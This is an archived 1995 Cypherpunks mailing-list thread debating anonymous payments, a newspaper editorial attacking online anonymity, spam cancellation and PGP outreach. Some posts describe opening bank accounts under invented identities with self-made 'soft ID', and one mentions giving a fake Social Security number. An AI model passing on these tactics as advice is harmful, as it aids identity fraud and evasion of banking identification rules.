Message-ID: <199501031745.JAA09281@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Brian Lane <blane@seanet.com>
>   I don't see why a debit card couldn't be anonymous, even to the point 
> of having no name, AND no picture on it. Yes, the bank has the money, but 
> their only obligation is to dish it out to the vendors/ATMs that you have 
> used your card with. Why should a bank care who you are once they have 
> your money in the account.

Again, it is unclear here whether you are proposing that you would be
anonymous to the bank or just have a blank card.  As I wrote, banks are
required to get SS#'s for depositers right now, and I wouldn't expect
that to change any time soon.  If anything, the trend appears to be
towards more tightening rather than less.  Duncan and/or Sandy have
suggested giving a fake SS# when you open your secured account; maybe
that would be legal but it sounds questionable to me.

>   As to avoiding fraud with the card, is it really that huge of a 
> problem? As long as noone copies the number(could go so far as no 
> embossed number. Just a gloss black card with a hologram of a Bald Eagle 
> on the front of it), and you don't lose the card how can someone use your 
> account?

I used my VISA yesterday, and after swiping it through the now-ubiquitous
card readers the vendor was required by the machine to manually enter the
last four digits on the card.  He complained that this was something new
and was happening very frequently now (maybe a change with 1995?).  I
have heard of fraud where people make fake VISA cards (or steal them) and
re-program the mag stripe to have a different number than what is on the
front.  Maybe this is a countermeasure for that.  It doesn't sound like a
blank card is the direction the industry is going.  Does anyone have more
info on this change?

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLwmNFBnMLJtOy9MBAQF4gAH7BgHuNzraGdAujkbnStXf9knBUYCKiJZv
zodiYtbEFAKuuPUIT/aqyM1L7IPRbMuNMSW9hmel3k11g9ATHy+doA==
=n71e
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Tue, 3 Jan 95 09:51:56 PST
To: Cypherpunks@toad.com
Subject: Press attack on anonymity.
Message-ID: <Pine.3.89.9501030943.A4287-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday an "opinion" article appeared in the SF Chronicle,
written by some unimportant person who knew absolutely
nothing about the internet.

Today a similar, but better informed article, appeared in
many newspapers, originating from the New York Times.

Articles written for newspapers are written to survive arbitrary
truncation, hence key points first, lesser points later.

The interesting thing is that the two articles, despite different
authors, had equivalent key points, implying that some single higher 
authority gave out a list of points to be made, but left the 
headline and overall spin to the columnist.

Indeed, when one reads beyond the key points that were equivalent
in both articles, it is as if one suddenly encounters a different
journalist.  There is an abrupt change of tone and style when one
reads from the uniform part to lesser points.

The key points in both articles are that the government should
do something coercive to stop anonymity on the internet, and that
there is widespread support for such a move.

Note that since both articles are obviously tentacles, there
is a mysterious and anonymous powerful person -- the single
higher authority of which I spoke earlier -- who is
anonymously attacking anonymity.

In my opinion when a mysterious anonymous and powerful voice
proclaims that the government should coerce someone, it is usually
the government speaking  -- a government department with guns is
running up a trial balloon.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 10:11:53 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501022121.NAA07411@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950103101009.18076C-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 2 Jan 1995, Hal wrote:

> . . .
> There are a couple of issues here.  One is whether you could get a
> debit card with another name printed on it than your own.  Sandy
> Sandfort and some others have suggested here that this would be legal
> and possible already as long as you don't do it with the intention to
> commit fraud.  You can open a secured account by mail and give a false
> name.
> 

Opening an account in the US without ID is very difficult
> I'm not sure what you do in this situation if they ask to see some ID
> when you try to use the card.  This would be rather embarrassing, it
> seems to me.  Sorry, I guess I left my drivers license in my other
> pants... Or, never mind, try this card.  That other one was from before I
> changed my name...
> 
> The other issue is whether you could set up a payment system which did
> not require social security numbers from the participants.  I think
> this is much more questionable.  Although the phone cards and some
> other restricted usage systems are apparently legal, bank accounts seem
> to have many more restrictions.  Barter and scrip systems are also
> heavily regulated.  All these laws involving reporting requirements,
> etc., were passed to help the government track the flow of money.
> There is no way the government is going to make an exception at this
> point.  In fact, I suspect that if the limited systems expanded to
> where they were used for general payments, the government would crack
> down.  I recall reading that just such a crackdown occured in Las Vegas
> when casino chips started to be accepted for non-gambling payments.
> 
> So, you may be able to have a form of anonymity from the person you are
> transacting with, but I don't think you can be anonymous from the bank
> and from the government.  And personally, I am more concerned about the
> bank and gov't tracking my spending patterns than whether the guy I buy
> gas from knowing my name.  The bank has a lot more information about me
> which is much more threatening to my privacy.  A nom de guerre VISA or
> debit card does not seem to help this problem.
> 
> Hal
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6
> 
> iQBVAwUBLwhuNRnMLJtOy9MBAQEkPQIAqEEglLxt8E4Rrgh7dR93fuCSJUI+UMgF
> 3XUrsTxM4whOejFMrluOAYM+2RdBOgYTk1mNEiAgSUPLLScIa9zU5A==
> =CF5G
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 10:20:33 PST
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <fQ72lyczBiz4075yn@netcom.com>
Message-ID: <Pine.SUN.3.91.950103101618.18076E-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 2 Jan 1995, Alan Bostick wrote:

> . . . 
> > Right now, I don't think U.S. Customs is going to ask you if you
> > have PGP in your PC if you leave the country, or return either.
> > 
> > They should, and I'd be proud to say yes.
> 
> And you can beam with pride as they impound your PC and take it away.
> Gosh.  Sometimes it's just swell to be a cypherpunk.  Kinda chokes me 
> up. . . .

No reason to risk a hassle by exporting PGP from the US on your 
laptop, it's everywhere.  Just take your Secret Keyring file and 
download PGP from a foreign FTP site once you are out of the US.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Tue, 3 Jan 95 09:16:13 PST
To: rogaski@phobos.lib.iup.edu (Mark Rogaski)
Subject: Re: HACK - EFH Presents Free PGP Encryption Workshop (fwd)
In-Reply-To: <199501030819.DAA29763@phobos.lib.iup.edu>
Message-ID: <9501031715.AA08257@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Just thought you may be interested in this. 
> Anybody ever hear of this EFH group?  It's nice to see somebody making
> PGP a little easier for the average jane/joe end-user-type to use.
>  

Yes, many of the EFH founders have participated in EFF-Austin events.
Steve Ryan, one of the EFH founders, spoke last week at HoHoCon (as 
did myself, Jim McCoy and Jeremy Porter.)

I think the program is an excellent idea, and will be getting feedback
from attendees with an eye to doing something similar here at some
point.

Doug



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "An annoyed user" <foo.bar@baz.quux.com>
Date: Tue, 3 Jan 95 10:54:25 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Anon penet addresses
Message-ID: <9501031851.AA27170@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


To whomever keeps signing up penet addresses of the form "anXXXX" to
cypherpunks: 

Cut it out.

I've changed your address from the anXXXX to the naXXXX address.  If you
don't know why anXXXX is antisocial, I can tell you while flaming you
for not understanding what you['re doing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 10:57:36 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: SAN FRANCISCO EDITORIAL
Message-ID: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Here is a guest editorial that ran in Monday's SF Chronicle.  It
should make your blood boil.


 S a n d y

			*	*	*

             ANARCHY, CHAOS ON THE INTERNET MUST END

Elections are over, and for better or worse, recognized leadership is
installed and working in most places.  Yet, in Cyberspace the electronic
world dominated by the much-vaunted Internet, there is not much order. 
This huge international computer web tying together about 30 million
people is governed by no one. 

What an amazing state of affairs.  The most powerful communications medium
ever invented is being left to the equivalent of mob rule.  Last year was
the year of the Internet in the media.  Clearly it is now mainstream. 
Nonetheless, judging by what you read or hear, the key question of who
runs it is not even an issue.  It is more fun, after all, to contemplate
shopping in an electronic mall or how to order a pizza through a modem. 

No matter, if you scratch the surface of this big, happy party, the need
for firm direction is all too obvious.  Also reported in the press is an
expanding array of Internet problems.  Unregulated broadcasting of
sexually explicit material that is readily available to children usually
heads the list, but on-line sexual harassment, profanity, defamation,
forgery and fraud run close seconds. 

The secretiveness that computer communications allows is a special reason
why abuse is easy.  National and personal security are serious
considerations when anyone can, with complete anonymity, send encrypted
information worldwide via the Internet.  Such problems are further
exacerbated by a computer located in Finland called the Anonymous Server,
which exists for the sole purpose of laundering computer messages, much
like dirty money is laundered through small island nations.  Consequently,
if you want to, say, threaten someone with death, your risk of retribution
is small, courtesy of the Anonymous Server. 

Nowhere are Cyberspace difficulties more evident than in the inevitable
swing toward Internet commercialization.  The widely reported turf war
rages between academic factions that controlled the Internet before it
went public and business newcomers who now want access to its huge
audience.  Electronic attacks on business people by means ranging from
computer insults, called flames, to assorted forms of electronic
vandalism, persist uncontrolled.  Worst of all are the ``canceller
robots,'' computer programs meant to erase the communications of anyone
the hackers who usually launch them wish to silence. 

These self-styled vigilantes routinely challenge free speech in Cyberspace
unabated.  Internet access providers, companies that connect people to the
Internet for a profit, likewise assume the role of censors, arbitrarily
closing accounts of those whom they disapprove. 

Given its international nature, one obvious way to bring much needed order
to the Internet is through diplomacy.  The United States should lead in
this.  A good beginning might be to urge the Finnish government to
deactivate the Anonymous Server.  Diplomacy could also help to establish
an international standard of recognizing laws existing at the point of
origin as controlling the message sender. 

When conflicts arise, governmental diplomacy should again be the answer,
just as it is with other trade and communications issues.  Next, laws
already regulating behavior in the real world should be applied in
Cyberspace.  This is already taking place on a case-by-case basis, but the
process is too slow.  The Supreme Court should act to crate a precedent
stating that crime is crime, even when the criminal instrument is a
computer keyboard. 

In the United States, legislation should be passed making Internet access
providers common carriers.  This will get them out of the business of
censorship and under the guiding hand of the Federal Communications
commission. 

People need safety and order in Cyberspace just as they do in their homes
and on the streets.  The current state of the Internet makes it clear that
anarchy isn't working.  If recognized governments don't find a way to
bring order to the growing and changing Internet, chaos may soon dictate
that the party is over. 

----------

Martha S. Siegel is the author of ``How to Make a Fortune on the
Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. 

			*	*	*

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 3 Jan 95 11:28:50 PST
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
Message-ID: <Pine.SUN.3.91.950103112653.2039A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The author of this editorial is the Siegel of Cantor and Siegel fame, 
nicht wahr?

Perhaps someone with detailed knowledge of that brouhaha should write the 
Examiner and point out that they allowed their editorial page to be used 
for ex parte pleading by one of the worst offenders in the history of the 
Internet -- and without informing their readers they were doing so.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 3 Jan 95 08:34:26 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <199501031634.AA16432@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:42 AM 1/3/95 -0800, bmorris@netcom.com wrote:
>With a debit card you can't be anonymous, because your money resides in
>the bank.  With digital cash, and the ability to transfer money to
>another digital cash card via phone lines, I don't see how they can
>successfully trace everything.  They will try, no doubt.

Unless you open a bank account in a nome de guerre.  In the Inter-mountain
West and in small towns elsewhere, it is often possible even today to open a
bank account with "soft ID."  Such ID would include employment ID and
student ID.  Since anyone can be an employer or a school, anyone can issue
such soft ID.

These items work very well if backed up with a secured VISA card from one of
the many issuers.  Some of the issuers of secure credit cards want
references but many will issue their cards if your name comes up as having
no credit record.  Made up people are the most likely to have no credit history.

Even though a VISA card is not meant to be ID, most people (even state DMV
offices) treat it as ID.

DCF

*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@coyote.csusm.edu (Marshall Clow)
Date: Tue, 3 Jan 95 11:42:04 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
Message-ID: <ab2f5905000210033c48@[144.37.6.105]>
MIME-Version: 1.0
Content-Type: text/plain


Sandy wrote:

>C'punks,
>
>Here is a guest editorial that ran in Monday's SF Chronicle.  It
>should make your blood boil.
>
[ ranting gibberish deleted ]

>
>Martha S. Siegel is the author of ``How to Make a Fortune on the
>Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz.
>

Not _the_ Martha Seigel, of Cantor & Seigel, targets of fine cancelbots
everywhere?

-- Marshall

Marshall Clow
Aladdin Systems
mclow@coyote.csusm.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Jan 95 09:55:13 PST
To: cypherpunks@toad.com
Subject: NYT on MEMS
Message-ID: <199501031755.MAA07431@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Malcolm Browne has longish article today on MEMS and current 
mathematical and engineering research on their use to control 
turbulence -- in planes, ships, submarines, blood, water, 
flatulence.

For email copy send blank message with subject:  MEM_tug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Tue, 3 Jan 95 10:08:25 PST
To: cypherpunks@toad.com
Subject: Re: GUI: PGP vs novices
Message-ID: <199501031814.NAA24428@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <ab1c939b040210039926@[192.187.167.52]>,
Dave Del Torto <ddt@lsd.com> wrote:
>The Cypherpunks should really launch a new list oriented toward novices
>with basic questions. It could be a Web page with a question form, or even
>an email address for the Web-challenged (I may do it, but I welcome any
>offers to help). As an incentive to Cypherpunks, their friends and
>colleagues and members of the general public, I'm hereby offering to spend
>some time answering questions for novice users at either:
>
>  <crypto-questions@lsd.com>            or
>  <pgp-questions@lsd.com>.

I attempted to set something like this up about 7 months ago.  I got so
little interest that I never set up the mailing list.

Better than a single person's address, I'd suggest a pgp-help mailing
list for all interested folks, just as the flexfax list works for 
flexfax users and commercial products have their own lists.

I just set up a list on pgp-help@hks.net, and I'll place
pgp-questions@lsd.com on the list (assuming you won't object).

Anybody else who's interested, send me mail at pgp-help-request@hks.net.
I don't have the list of folks who volunteered last time, so this'll be
fresh.
- - --
Todd Masco     | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus@hks.net |  scornful tone, 'it means just what I choose it to mean -
cactus@bb.com  |  neither more nor less.'"   - Lewis Carroll

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwlY4hNhgovrPB7dAQEBvQQA1vxwGcYZ28qlytX3jrY95WN/L11X1FG2
MGwWjjk8BZ2cXk1uvLWtuhoNGwzqhup/aGLVGuPo2QjFPiqwjoA5pa+9+8093dpl
tBMziDmJ5/Pg3jWirRiuuREa5Ki977I/uplp3Ysh0ioz07Ws44susZrcdDHbIChL
TYKrC1DROi4=
=GbTI
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwmT2yoZzwIn1bdtAQFvxwGAgkaHPEh2A7NuPXJgtNBNqV4j9KrnLbex
az8jQmFpTfBaAbLPfP5i7tdVPjJ21xom
=yR+4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Tue, 3 Jan 95 13:44:53 PST
To: cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
Message-ID: <9501032146.AA19980@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort posted an editorial from the Mondays SF Chronicle.

There is a front page story in todays San Jose Mercury News on why
anonymity is a bad thing.

Its from a New York Times story by Peter H. Lewis


The question is who launched all this stuff?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Tue, 3 Jan 95 10:47:10 PST
To: Cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
Message-ID: <199501031847.AA16557@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 AM 1/3/95 -0800, James A. Donald wrote:
>Yesterday an "opinion" article appeared in the SF Chronicle,
>written by some unimportant person who knew absolutely
>nothing about the internet.
>
>Today a similar, but better informed article, appeared in
>many newspapers, originating from the New York Times.

The later is presumably Peter Lewis' article on anonymity on the nets that
appeared in the Saturday Times.

It was not that negative about anonymity although it did seem to confuse
spoofing with anonymity (since it talked about digital signatures as a
response to "problems").

He did not advocate government intervention.

Since the Supremes have always supported anonymous speech, it seems unlikely
that anonymity could be outlawed.  Things like mandatory identification for
net access (hard to enforce worldwide) would also seem to be a "government
license for publication" which is what the 1st Amendment was specifically
written to stop.  In any case, using companies as cutouts for such
activities is trivial.  Mandatory ID of any sort only goes back as far as
the first entity which can be a company formed to block tracing.

DCF
*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 13:47:13 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103112653.2039A-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.950103134419.1971A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 3 Jan 1995, Charles Bell and several others wrote along
these lines:

> The author of this editorial is the Siegel of Cantor and Siegel fame, 
> nicht wahr?
> 
> Perhaps someone with detailed knowledge of that brouhaha should write the 
> Examiner and point out that they allowed their editorial page to be used 
> for ex parte pleading by one of the worst offenders in the history of the 
> Internet -- and without informing their readers they were doing so.

Gosh, my education seems to be remiss with regard to the case/
incidents referred to.  Could someone let us know who this person
is and what her claim to fame is?  (It certainly isn't her logic
or writing ability.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Tue, 3 Jan 95 12:04:13 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103112653.2039A-100000@eskimo.com>
Message-ID: <199501032006.AA04977@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Despite the odiousness of the source, might it be a Good Thing to get
a law giving ISPs common-carrier status passed? 

When you're a common carrier, no one hassles you about the content you
pass-- this would make it much easier for anon remailers to flourish.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
		  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwmuSafb4pLe9tolAQF/EwQAkaG3Aeg5NRAXtlC7EkhQz1iONk0cBFSA
a8CS+w0MgIK2ZpdQRfXDQuBrZ1Mowx1OTEaw4pZayIomFWAb1D4Kkdi8NKgBN53C
Y4T8KEri2xSP3MESjKGcqw8p8ps/8W4ylGw2xyatIq8GWilNb9DHe5Y+/fxCkcyg
aONdWuogsQE=
=dYl4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Tue, 3 Jan 95 12:11:05 PST
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: Stegno for Kids
In-Reply-To: <9501031834.AA21554@elysion.iaks.ira.uka.de>
Message-ID: <Pine.ULT.3.91.950103140953.24233A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Hadmut Danisch wrote:

> I had something like that as a toy about 20 years ago. A single pen with
> tips on both sides. One to write, the other to develop. Didn't they have it
> in America also?

There was also this thing where you would get these books and a magic 
marker, and they you would do puzzles in the book, and use the pen to 
develope the answer.

The old Infocom hint books also used a similiar setup.

____        Robert A. Hayden       <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-          <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info  <=> All I want is a cure...  
   \/   Finger for PGP Public Key  <=>      And all my friends back!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erik Selberg <speed@cs.washington.edu>
Date: Tue, 3 Jan 95 14:17:58 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: SAN FRANCISCO EDITORIAL
Message-ID: <199501032218.OAA03693@meitner.cs.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


> C'punks,
> 
> Here is a guest editorial that ran in Monday's SF Chronicle.  It
> should make your blood boil.
> 
> 
>  S a n d y
> 
> 			*	*	*
> 
>              ANARCHY, CHAOS ON THE INTERNET MUST END

Yup, it's the same net-spamming Siegel, arguing for:
  End of mob rule, so she can advertise everywhere for free;
  End of anonymous encryption, so we can't send plans for the new
      stealth basselope to the commies (or I guess it's liberals, nowaways).
  End of anonymous mail, so she can tell back at all those who yell at
      her for spamming
  Terms of surrender for us academic types, who only exist to attack
      business people (and, if you're at CMU, check out the nudie
      pics)
  End of private providers yanking abuser's accounts

basicly, a nice editorial which sugar-coats what she wants, which is
the ability to send out what she wants, ensure that it gets to
everyone she sends it to, and not worry about flames or getting the
boot. 

What's scary is that it's very easy to slide this kind of stuff onto
an ignorant and conservative legislature. Big leaders who want to do
good see an obvious good side to removing the ability to post
anonymously --- law enforcement can track people making drug
transactions, and if someone broadcasts a nudie pick found to be
obscene in TN, well hey, they can now haul his ass to TN for some jail
time. It's going to take a lot of lobbying to ensure that this doesn't
happen.


work: (206) 543-7798                                  Erik Selberg
play: (206) 517-3039                                  speed@cs.washington.edu

	     I get by with a little help from my friends...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 3 Jan 95 11:38:29 PST
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
Message-ID: <9501031929.AA13882@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort writes (quoting SF Chronicle article):

  [ Much bs elided ]

> Martha S. Siegel is the author of ``How to Make a Fortune on the
> Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. 

Isn't this the Siegel of the infamous "Canter and Siegel"?


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 3 Jan 95 14:33:58 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <9501032202.AA13835@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950103143153.4386D-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Oh, THAT Cantor and Seigle.  If someone with the facts (Perry?)
is so inclined, a letter to the editor would be in order.  These
scum bags need to be exposed.  The address is:

			San Francisco Chronicle
			5th and Mission
			San Francisco, CA 94103


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 3 Jan 95 14:44:36 PST
To: cypherpunks@toad.com
Subject: Re: San Francisco Editorial
Message-ID: <199501032244.OAA15281@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Another point re Cantor and Siegel is that there is now a service
calling itself CancelMoose which goes through Julf's anon server in
Finland (anon.penet.fi) to cancel spams.  (Spams are off-topic,
nearly-identical posts to large numbers of groups.) This is what Siegel is
really upset about.  She and her husband are publishing a book telling
businesses how they can use spam posts on usenet as free advertising.
But now CancelMoose is a relatively accepted counter to these
increasingly-frequent spams (pyramid schemes, etc.).  This makes their
book obsolete and really hits them where it hurts.  But they can't sue
CancelMoose because its identity is hidden.

Personally, I don't like the idea of cancelling other people's posts,
spam or not.  I would rather see news readers enhanced to detect copies
of posts I have already seen and delete them.  The awful thing about
Cantor and Siegel's Green Card spam was that they didn't cross-post, they
used a bot to individually post to all groups.  I was shown their
message headers for days.  Ordinary off-topic posts don't bother me much
because I can ignore them easily.  With a better newsreader the Green
Card spam would have been equally trivial to ignore.

The scary thing about cancels is that some proposals have actually been
directed at anonymous posts themselves.  Someone anonymously posted
what purported to be a grisly transcript of the last seconds of the
doomed Challenger crew as they fell to the ocean.  This caused a great
hue and cry and some calls for banning anonymous posts and/or
retroactively cancelling them.  This led to some very amusing events
which Detweiler has chronicled in his FAQ on anonymity, the net result
of which was that the idea was discredited.  But the emergence of
CancelMoose is not an altogether positive event in my view.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLwnTGRnMLJtOy9MBAQGjFAH/WEzWgAEG4mX9c6yR1iyR2nWq3V1AvUBL
lC1rTlUWUf8YWZDmVAuOkg8AH8nPo3L1e67l66wMrgGedaCD39/3Aw==
=psrV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access3.digex.net>
Date: Tue, 3 Jan 95 11:55:53 PST
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103102549.18076G-100000@crl.crl.com>
Message-ID: <Pine.SUN.3.91.950103145123.9894B-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Sandy Sandfort wrote:

> Date: Tue, 3 Jan 1995 10:58:09 -0800 (PST)
> From: Sandy Sandfort <sandfort@crl.com>
> To: Cypherpunks <cypherpunks@toad.com>
> Subject: SAN FRANCISCO EDITORIAL
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> Here is a guest editorial that ran in Monday's SF Chronicle.  It
> should make your blood boil.
> 
> 
>  S a n d y
> 
> 			*	*	*
> 
>              ANARCHY, CHAOS ON THE INTERNET MUST END


[Trash about mob rule, and the need for international diplomacy (Read U.S. 
imposition of local law to foreign sovereigns) to correct the problem, 
happily deleted.]


> 
> Martha S. Siegel is the author of ``How to Make a Fortune on the
                                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

> Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. 
  ^^^^^^^^^^^^^^^^^^^^^^^^              ^^^^^^^^^

I guess anonymous posting abilities just kill the internet direct mail 
